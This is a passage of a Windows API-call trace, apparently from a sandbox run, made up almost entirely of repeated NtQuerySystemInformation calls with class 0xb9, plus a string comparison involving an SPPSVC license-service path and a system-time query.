NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.790] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad8, Length=0x50, ResultLength=0x0) [0271.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x28, ResultLength=0x0) [0271.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0271.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x38, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.799] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfdc70 | out: lpSystemTimeAsFileTime=0xc751dfdc70*(dwLowDateTime=0x3484889, dwHighDateTime=0x1d5fb6f)) [0271.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x50, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x50, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x28, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x28, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x28, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd520, Length=0x20, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4a0, Length=0x20, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x38, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd570, Length=0x20, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd570, Length=0x20, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaa0, Length=0x50, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x50, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x28, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7e0, Length=0x28, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, 